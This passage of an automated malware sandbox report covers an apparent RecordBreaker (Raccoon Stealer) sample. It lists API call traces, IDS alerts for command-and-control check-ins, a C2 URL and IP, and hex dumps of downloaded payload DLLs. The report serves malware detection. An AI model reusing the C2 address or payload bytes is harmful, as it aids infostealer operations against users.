egOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,StrCpyW,LocalFree,LocalFree,2_2_0040E48D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F012 CancelWaitableTimer,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,CreateFileMappingW,FindCloseChangeNotification,LocalAlloc,GetLastError,GetLastError,LocalFree,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,CreateEventA,SetEvent,ResetEvent,CreateMutexA,SetEnvironmentVariableA,SetEnvironmentVariableA,ReleaseMutex,SetEnvironmentVariableA,GetLastError,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,FindCloseChangeNotification,OutputDebugStringA,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,ReleaseSemaphore,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateMutexA,ReleaseMutex,RegOpenKeyExA,LocalAlloc,GlobalFree,2_2_0040F012
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC1E CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,RegOpenKeyExA,CreateFileMappingW,SetEnvironmentVariableA,SetEnvironmentVariableA,CloseHandle,RegOpenKeyExA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateEventA,SetEvent,ResetEvent,CreateMutexA,ReleaseMutex,OutputDebugStringA,CreateWaitableTimerA,SetEnvironmentVariableA,GetLastError,CancelWaitableTimer,GetLastError,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,GetLastError,ReleaseSemaphore,RegOpenKeyExA,OutputDebugStringA,Process32FirstW,lstrcmpiW,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,LocalAlloc,OutputDebugStringA,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,GetLastError,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,GetLastError,CreateMutexA,ReleaseMutex,GetLastError,SetEnvironmentVariableA,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,Process32FirstW,CloseHandle,2_2_0040FC1E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403E9F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_00403E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004087AA LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,2_2_004087AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004041AD StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_004041AD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004017B3 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,2_2_004017B3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F23A lstrlenA,lstrlenA,lstrlenA,LocalAlloc,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,GetLastError,CloseHandle,OutputDebugStringA,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,RegOpenKeyExA,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,GetLastError,LocalAlloc,LocalFree,CreateMutexA,ReleaseMutex,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,CloseHandle,GetLastError,GetLastError,CreateMutexA,GetLastError,ReleaseMutex,FindFirstFileA,FindClose,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateSemaphoreA,GetLastError,ReleaseSemaphore,SetEnvironmentVariableA,GlobalFree,2_2_0040F23A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403BE6 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_00403BE6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004084FB LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_004084FB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040392D LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_0040392D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407938 LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,2_2_00407938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E83D CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CancelWaitableTimer,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,OutputDebugStringA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,LocalAlloc,lstrlenW,LocalAlloc,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,OutputDebugStringA,CloseHandle,OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileA,FindClose,LocalAlloc,SetEnvironmentVariableA,LocalFree,GetLastError,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateMutexA,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,lstrlenW,StrCpyW,LocalFree,StrCpyW,LocalFree,2_2_0040E83D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004103E1 OutputDebugStringA,SetEnvironmentVariableA,LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_004103E1
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rbx0_2_00007FF708E12034
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rdi0_2_00007FF708EC0930
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rdi0_2_00007FF708EC0930
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rbx0_2_00007FF708E12034
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rsi0_2_00007FF708EC0100
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push r140_2_00007FF708F61FD0
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF708EC0200
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rsi0_2_00007FF708EC0200
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rdi0_2_00007FF708F624A0
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rbx0_2_00007FF708EC0710
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rbx0_2_00007FF708EC0710
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF708EC0710
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rbx0_2_00007FF708EC0710
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rbx0_2_00007FF708EC0710
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rbx0_2_00007FF708EC0710
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 4x nop then push rsi0_2_00007FF708EC08B0

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.4:49730 -> 95.169.205.186:80
                    Source: TrafficSnort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 95.169.205.186:80 -> 192.168.2.4:49730
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://95.169.205.186:80/
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Sat, 06 Jul 2024 02:21:57 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:48 GMTETag: "62548404-1f29b8"Expires: Sat, 06 Jul 2024 02:51:57 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Sat, 06 Jul 2024 02:21:59 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:42 GMTETag: "625483fe-6db00"Expires: Sat, 06 Jul 2024 02:51:59 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Sat, 06 Jul 2024 02:22:00 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 21:52:46 GMTETag: "629299ae-13900"Expires: Sat, 06 Jul 2024 02:52:00 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Sat, 06 Jul 2024 02:22:00 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:36 GMTETag: "625483f8-991b8"Expires: Sat, 06 Jul 2024 02:52:00 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Sat, 06 Jul 2024 02:22:01 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:40:08 GMTETag: "62548418-a73b8"Expires: Sat, 06 Jul 2024 02:52:01 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 